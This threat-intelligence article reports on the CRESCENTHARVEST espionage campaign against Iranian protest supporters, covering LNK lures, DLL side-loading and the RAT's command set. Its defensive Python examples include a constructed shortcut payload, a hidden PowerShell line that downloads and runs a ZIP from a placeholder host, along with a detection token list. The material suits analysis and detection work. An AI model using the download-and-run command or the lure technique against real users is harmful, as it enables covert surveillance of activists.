Iranian Protest Supporters Targeted by CRESCENTHARVEST Cyber Espionage Campaign

Cybersecurity researchers have uncovered a cyber espionage campaign, tracked as CRESCENTHARVEST, that targets individuals supporting the ongoing protests in Iran. The Acronis Threat Research Unit (TRU) first observed the activity on January 9, 2026, and reports that the attackers' goal is to deploy a remote access trojan (RAT) capable of executing commands, logging keystrokes, and exfiltrating sensitive data. How many targets were actually compromised is not yet known.

The campaign exploits the current geopolitical climate by enticing victims to open malicious .LNK files disguised as images or videos of the protests. The shortcuts are bundled with genuine media and a Farsi-language report titled "Updates from the Rebellious Cities of Iran", which lends the package credibility among Farsi speakers looking for protest-related information.

While the exact origin of CRESCENTHARVEST is yet to be confirmed, it is believed to be orchestrated by an Iran-aligned threat group. This marks the second such campaign targeting specific individuals following the nationwide protests that began in late 2025. In January 2026, French cybersecurity firm HarfangLab detailed a similar operation named RedKitten, which targeted non-governmental organizations and individuals documenting human rights abuses in Iran, deploying a custom backdoor known as SloppyMIO.

The initial access vector for CRESCENTHARVEST remains unknown, but it is suspected that the attackers employ spear-phishing tactics or prolonged social engineering efforts. These methods involve building rapport with victims over time before delivering the malicious payloads. Iranian hacking groups like Charming Kitten and Tortoiseshell have a history of using sophisticated social engineering attacks, often creating fake personas and cultivating relationships with targets over extended periods before deploying malware.

The attack sequence begins with a malicious RAR archive that claims to contain information about the Iranian protests. Alongside genuine images and videos, the archive holds two Windows shortcut (LNK) files that pose as media by using a double extension (e.g., .jpg.lnk or .mp4.lnk); because Explorer never displays the .lnk extension, a file named photo.jpg.lnk appears simply as photo.jpg with a shortcut overlay. When a shortcut is opened, it runs PowerShell code that downloads a second archive, this time a ZIP, while also opening a harmless image or video so the victim believes they have viewed legitimate content.
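As an added example, not code from the original article or from Acronis TRU, the following Python script shows how an analyst can triage files pulled from such an archive: it flags double-extension shortcut names, walks the ShellLink (LNK) structure to recover the target path and command-line arguments, and scans those strings for tokens that have no business in a shortcut to a photo. The sample shortcut is constructed in the script itself (the file name, the relative path, and the download host example.invalid are all placeholders), so it runs offline and does not reproduce any real payload.

```python
import struct

# ShellLink header constants from the MS-SHLLINK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 1 << 0, 1 << 1
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 1 << 2, 1 << 3, 1 << 4
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 5, 1 << 6, 1 << 7
# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

MEDIA_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".mp4", ".mov", ".avi", ".pdf")
# Tokens that rarely belong in a shortcut that supposedly opens a photo or video.
SUSPICIOUS_TOKENS = ("powershell", "pwsh", "cmd.exe", "mshta", "-enc", "-w hidden",
                     "invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                     "expand-archive", "start-process", "iex")


def is_double_extension_lnk(name: str) -> bool:
    """True for names like photo.jpg.lnk or clip.mp4.lnk (Explorer shows them as photo.jpg)."""
    low = name.lower()
    return low.endswith(".lnk") and low[:-4].endswith(MEDIA_EXTS)


def parse_lnk(data: bytes) -> dict:
    """Walk the ShellLink structure far enough to return its StringData fields."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip the IDList (2-byte size prefix, not self-inclusive)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # skip LinkInfo (4-byte size that includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + count * 2].decode("utf-16-le", "replace")
            pos += count * 2
        else:
            fields[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields


def triage(name: str, data: bytes):
    """Return (findings, parsed fields) for one file extracted from an archive."""
    findings = []
    if is_double_extension_lnk(name):
        findings.append("double-extension shortcut")
    try:
        fields = parse_lnk(data)
    except ValueError:
        return findings, {}
    command = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    findings += [f"suspicious token: {t}" for t in SUSPICIOUS_TOKENS if t in command]
    return findings, fields


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal ShellLink blob for testing; not a captured sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))   # timestamps, icon index, etc. zeroed
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


# Constructed stand-in for the decoy-then-download pattern (placeholder names and host).
SAMPLE_NAME = "tehran_protest_01.jpg.lnk"
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-w hidden -c "Start-Process .\\media\\tehran_protest_01.jpg; '
    'Invoke-WebRequest https://example.invalid/u.zip -OutFile $env:TEMP\\u.zip; '
    'Expand-Archive $env:TEMP\\u.zip $env:TEMP\\u; '
    'Start-Process $env:TEMP\\u\\software_reporter_tool.exe"')

if __name__ == "__main__":
    found, parsed = triage(SAMPLE_NAME, SAMPLE_LNK)
    print(SAMPLE_NAME, found)
    print(parsed)
```

The parser deliberately stops after StringData; the ExtraData blocks that follow are not needed to see what the shortcut runs. Point `triage` at every file in an extracted archive rather than only at names ending in .lnk, since a shortcut renamed to a bare .jpg still carries the ShellLink header.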

The retrieved ZIP archive contains a legitimate Google-signed binary (software_reporter_tool.exe) from Chrome's cleanup utility together with several DLL files. The signed executable serves as a side-loading host: it resolves DLLs such as version.dll from its own directory before the copy in System32, so the attacker's libraries run inside a process that carries a valid Google signature. Two of the bundled libraries are malicious:

– urtcbased140d_d.dll: A C++ implant that extracts and decrypts Chrome’s app-bound encryption keys through COM interfaces, sharing similarities with an open-source project known as ChromElevator.

– version.dll (CRESCENTHARVEST): A remote access tool that enumerates installed antivirus products and security tools, lists local user accounts, loads DLLs, and harvests system metadata, browser credentials, Telegram desktop account data, and keystrokes.
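The side-loading pattern above is straightforward to hunt for in endpoint telemetry. The Python below is an added example, not code from the article or from Acronis, that runs a simple rule over Sysmon image-load (event ID 7) records: a known side-loading host loading a DLL that normally lives in a system directory, or any untrusted DLL, from the host's own folder. The five events are constructed inline with placeholder paths and timestamps; the field names (Image, ImageLoaded, Signature, SignatureStatus) are the ones Sysmon emits, but the values are invented for the demonstration.

```python
import ntpath

# Signed binaries known to be abused as side-loading hosts (the page names Chrome's
# software_reporter_tool.exe); extend this set with loaders tracked in your environment.
ABUSABLE_LOADERS = {"software_reporter_tool.exe"}
# Directories from which a Windows system DLL is legitimately loaded.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows\winsxs")
# DLL names that Windows itself supplies; a copy next to the EXE is a red flag.
SYSTEM_DLL_NAMES = {"version.dll"}
TRUSTED_SIGNERS = ("microsoft windows", "microsoft corporation", "google llc")


def norm(path: str) -> str:
    """Lower-case and normalise separators so comparisons are case-insensitive."""
    return path.replace("/", "\\").lower()


def is_side_load(event: dict):
    """Return a reason string if a Sysmon ImageLoad record looks like DLL side-loading, else None."""
    if event.get("EventID") != 7:
        return None
    image, dll = norm(event["Image"]), norm(event["ImageLoaded"])
    loader, dll_name = ntpath.basename(image), ntpath.basename(dll)
    dll_dir = ntpath.dirname(dll)
    if loader not in ABUSABLE_LOADERS:
        return None
    if dll_dir.startswith(SYSTEM_DIRS):          # loaded from a system directory: expected
        return None
    same_dir = dll_dir == ntpath.dirname(image)
    signed_ok = (event.get("SignatureStatus", "").lower() == "valid"
                 and event.get("Signature", "").lower().startswith(TRUSTED_SIGNERS))
    if same_dir and dll_name in SYSTEM_DLL_NAMES:
        return f"{loader} loaded system DLL name {dll_name} from its own directory"
    if same_dir and not signed_ok:
        return f"{loader} loaded unsigned or untrusted DLL {dll_name} from its own directory"
    return None


def hunt(events):
    """Return (UtcTime, reason) for every event the rule fires on, in input order."""
    hits = []
    for ev in events:
        reason = is_side_load(ev)
        if reason:
            hits.append((ev.get("UtcTime", ""), reason))
    return hits


# Constructed Sysmon event ID 7 records; paths, times and signature values are placeholders.
_DROP = r"C:\Users\alice\AppData\Local\Temp\updates"
SAMPLE_EVENTS = [
    {"EventID": 7, "UtcTime": "2026-01-09 10:15:02", "Image": _DROP + r"\software_reporter_tool.exe",
     "ImageLoaded": _DROP + r"\version.dll", "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "UtcTime": "2026-01-09 10:15:02", "Image": _DROP + r"\software_reporter_tool.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 7, "UtcTime": "2026-01-09 10:15:03", "Image": _DROP + r"\software_reporter_tool.exe",
     "ImageLoaded": _DROP + r"\urtcbased140d_d.dll", "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable"},
    {"EventID": 7, "UtcTime": "2026-01-09 10:15:03", "Image": _DROP + r"\software_reporter_tool.exe",
     "ImageLoaded": _DROP + r"\sqlite3.dll", "Signed": "true", "Signature": "Google LLC", "SignatureStatus": "Valid"},
    {"EventID": 7, "UtcTime": "2026-01-09 10:16:40", "Image": r"C:\Windows\System32\notepad.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll", "Signed": "true",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for when, why in hunt(SAMPLE_EVENTS):
        print(when, why)
```

The rule keys on the loader name to keep noise down; a broader variant drops the ABUSABLE_LOADERS check and fires on any signed executable that loads a SYSTEM_DLL_NAMES entry from a user-writable directory, at the cost of more triage. The fourth event shows why the signer check matters: a DLL legitimately shipped next to the host is ignored when its signature is valid and from an expected publisher.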

CRESCENTHARVEST uses the Windows WinHTTP APIs to communicate with its command-and-control (C2) server (servicelog-information[.]com), so its traffic looks like ordinary HTTP from a Windows process. The malware supports the following commands:

– Anti: Performs anti-analysis checks.

– His: Steals browser history.

– Dir: Lists directories.

– Cwd: Retrieves the current working directory.

– Cd: Changes directory.

– GetUser: Obtains user information.

– ps: Executes PowerShell commands (currently non-functional).

– KeyLog: Activates keylogger.

– Tel_s: Steals Telegram session data.

– Cook: Steals browser cookies.

– Info: Steals system information.

– F_log: Steals browser credentials.

– Upload: Uploads files.

– shell: Executes shell commands.

This campaign underscores a decade-long pattern of suspected nation-state cyber espionage operations targeting journalists, activists, researchers, and diaspora communities globally. The tactics observed in CRESCENTHARVEST reflect well-established methods, including LNK-based initial access, DLL side-loading through signed binaries, credential harvesting, and social engineering aligned with current events.

This revelation comes shortly after reports that Iran’s government likely tracked protesters’ locations through their phones, sending them text messages warning that their presence at illegal gatherings had been recorded and that they were under intelligence monitoring. This move appears to be an attempt to suppress dissent. According to a report by Iran-focused digital rights group Holistic Resilience, some individuals who posted on social media about the protests and other political topics have had their SIM cards suspended.

The Islamic Republic is developing a distinct model of digital control and surveillance, one that is not based on permanent isolation but on conditional and interruptible connectivity. The central pillar of this model is the National Information Network (NIN), which evolves continuously alongside advances in communications technologies and is expanded in response to changing technical and political requirements.

This strategy combines information from e-government databases, surveillance cameras, and malware deployed via social engineering to establish remote access and monitor citizens’ online activities in a sustained manner. One such tool is a lightweight modular trojan called 2Ac2 RAT, designed for victim device control and data collection.

The CRESCENTHARVEST campaign highlights the ongoing cyber threats faced by individuals involved in political activism and underscores the need for heightened cybersecurity awareness and protective measures among those at risk.